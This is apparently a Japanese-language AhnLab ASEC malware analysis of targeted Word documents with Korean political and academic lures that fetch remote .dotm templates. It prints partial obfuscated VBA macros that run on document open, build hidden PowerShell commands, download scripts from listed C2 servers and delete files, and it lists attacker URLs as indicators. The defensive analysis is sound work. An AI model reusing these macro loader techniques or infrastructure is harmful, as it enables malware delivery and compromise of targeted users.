ASEC 分析チームでは、以下のように二度にわたり「謝金支給依頼書」、「夏季学術大会略歴作成様式」というタイトルの Word ドキュメントによるマルウェアが拡散していることを紹介した。類似する攻撃方式をモニタリングしていたところ、6月と7月1日に、同じ制作者によって新たな Word ドキュメントが配布された状況を確認した。
新たに捕捉された不正な Word ドキュメントのタイトル
- 민주평통-한국정치외교사학회 공동 학술 회의 프로그램 (최종본).docx
(翻訳:民主平統-韓国政治外交史学会共同学術会議プログラム(最終版).docx) – 6月に追加確保 - [남북회담본부 정책자문위원] 약력 작성 양식.docx
(翻訳:[南北会談本部政策諮問委員]経歴作成様式.docx) – 7月1日に追加確保
過去に同じタイプとして紹介された不正な Word に関するブログの内容
- ターゲット型攻撃による不正な Word ドキュメント「謝金支給依頼書」の拡散 (6月29日 ASEC ブログ)
– https://asec.ahnlab.com/jp/24462/ - 夏季学術大会の略歴書式ファイルに偽装した Word ファイルによるマルウェアが拡散中 (6月30日 ASEC ブログ)
– https://asec.ahnlab.com/ko/24649/ - 正常な Excel/Word ドキュメントに偽装したマルウェア (6月11日 ASEC ブログ)
– https://asec.ahnlab.com/jp/23875/
7月1日に確認された配布ファイル名は「[남북회담본부 정책자문위원] 약력 작성 양식.docx (翻訳:[南北会談本部政策諮問委員]略歴作成様式.docx)」であり、文書内の External リンクを通じて外部 dotm マクロを含む Word ドキュメントファイルをダウンロードする構造である。
実際に不正な行為を実行するマクロコードを持っている InterKoreanSummit.dotm ファイルには、以下のような難読化されたコードが存在する。このマクロは、6月11日に公開した正常な Excel/Word ドキュメントに偽装したマルウェアに使用されたマクロと類似した形式を持っている。
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
eifhhdfasfiedf
aksjdkjaskf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "tlsiapowtlsiaertlsiastlsiahetlsialltlsia.etlsiatlsiaxtlsiae"
fjdjkasf = "tlsiajdsladkf"
fjdjkasf = Left(fjdjkasf, 5)
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
hdfksallasjkdlaf = "$atlsiatlsiatlsia='tlsiaC:tlsiatlsia\wtlsiatlsiaintlsiatlsiadotlsiatlsiawstlsiatlsia\ttlsiaetlsiamptlsia\DtlsiatlsiaMItlsia5tlsiaCtlsiaA0tlsia6.tlsiatlsiatmtlsiaptlsia'tlsiatlsia;tlsia"
hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
...(省略)
aksfkjaskjfksnkf = "tlsiatlsia$tlsiactlsiatlsia;$tlsiadtlsia=[tlsiatlsiaIOtlsia.tlsiatlsiaFitlsiale]tlsiatlsia:tlsia:RtlsiatlsiaeatlsiadAtlsialtlsiatlsialTtlsiaetlsiaxttlsiatlsia($tlsiaatlsiatlsia)tlsia;tlsia$tlsiae=tlsiaietlsiatlsiax $tlsiad;tlsiaitlsiaetlsiax tlsia$tlsiae"
aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
End Function
Function aksjdkjaskf()
Dim SngSec As Single
...(省略)
sakjfkalsjfkasjf = Replace(sakjfkalsjfkasjf, fjdjkasf, "")
djfkasjfskaal = Left(sakjfkalsjfkasjf, 32)
djfkasjfskaal = Right(djfkasjfskaal, 28)
If djfkasjfskaal = "" Then
Else
Kill djfkasjfskaal
End If
End Function[コード1] InterKoreanSummit.dotm ファイル内部のマクロコードの一部
Attribute VB_Name = "NewMacros"
Sub djfksdalfjkasj()
Selection.TypeText Text:="a"
End Sub
Sub ejdksaljfkalkf()
Selection.TypeText Text:="b"
End Sub
Sub eijdklsafkasdk()
Selection.TypeText Text:="c"
End Sub
Sub uehfsahdkajkas()
Selection.TypeText Text:="d"
End Sub
...(省略)
Sub euehfhafjhdjkafqka()
Selection.TypeText Text:="" Application.Run MacroName:="Project.NewMacros.euirieafkjekjf" Application.Run MacroName:="Project.NewMacros.qjiejwfksjalksainuse" Application.Run MacroName:="Project.NewMacros.euirieafkjekjf" Selection.TypeText Text:=""
End Sub
Sub eijfkdjqjdfklafea()
Selection.TypeText Text:="+"
End Sub
Sub efuehjsahfklkejklafe()
Selection.TypeText Text:="{"
End Sub
...(省略)
Sub qeuejsahfdasight()
Selection.MoveRight Unit:=wdCharacter, Count:=1
End Sub
Sub idifdsakjflakdsagedown()
Selection.MoveDown Unit:=wdScreen, Count:=1
End Sub[コード2] InterKoreanSummit.dotm ファイル内部のマクロコードの一部
マクロを実行すると、C2(hxxp://ripzi.getenjoyment.net/le/eh.txt)に接続して追加のスクリプトをダウンロードし、C:\windows\temp\DMI5CA06.tmp ファイルを kill する行為を実行する。ダウンロードされたスクリプトは以下のように6月の「正常な Excel/Word ドキュメントに偽装したマルウェア」で確認されたスクリプトと同じコードであり、C2 アドレスだけが異なる。
また、6月にはこのタイプの不正なファイルが「민주평통-한국정치외교사학회 공동 학술 회의 프로그램 (최종본).docx (翻訳:民主平統-韓国政治外交史学会共同学術会議プログラム(最終版).docx)」という名前で配布されたことを確認した。このファイルの内部に存在する External リンクは、以下の通りである。
このアドレスからダウンロードした Seminarfinal.dotm ファイルには、上記で説明した InterKoreanSummit.dotm ファイルと類似したマクロが存在する。以下は、Seminarfinal.dotm に存在する難読化されたマクロコードの一部である。
Private Sub Document_Open()
eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = "tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, "tuwhn", "")
yhjhfjdhfdhfuesk(0) = "tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn "
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), "tuwhn", "")
...(省略)
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(4), "tuwhn", "")
yhjhfjdhfdhfuesk(5) = "etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn"
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), "tuwhn", "")
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, "", "open", 0
End Function[[コード3] Seminarfinal.dotm ファイル内部のマクロコードの一部
このマクロも C2(hxxp://likel.atwebpages.com/bu/ma.txt)に接続して追加のスクリプトをダウンロードする。ダウンロードされたスクリプトは、すでに説明した hxxp://ripzi.getenjoyment.net/le/eh.txt に存在するスクリプトと同じである。
これらのファイルは、すべて User 名が ‘Naeil_영문시작‘ (翻訳:Naeil_英文開始)というユーザーから収集された。これは、過去の「[** 夏季学術大会]_経歴書.doc)」と「謝金支給依頼書」の作成者と一致することから、同じ攻撃者によって生成されたファイルと推定される。
最近、このように特定のユーザーをターゲットにしたマルウェアが活発に配布されている。大半が同じ攻撃者により生成されたものと推定され、ユーザーの注意が必要である。出どころが不明なユーザーから送信されたメールに添付されたファイル、およびリンクは開かないようにし、マクロを実行しないようにしなければならない。
AhnLab V3 プロダクトラインでは、このようなターゲット型攻撃の不正な Word ドキュメントを以下のように検知している。
[ファイル検知]
- Downloader/XML.External
- Downloader/DOC.Generic
[IOC]
- hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
- hxxp://likel.atwebpages.com/officeDocument/2006/relationships/attachedTemplate/Seminarfinal.dotm
- hxxp://ripzi.getenjoyment.net/le/eh.txt
- hxxp://likel.atwebpages.com/bu/ma.txt
Categories:マルウェアの情報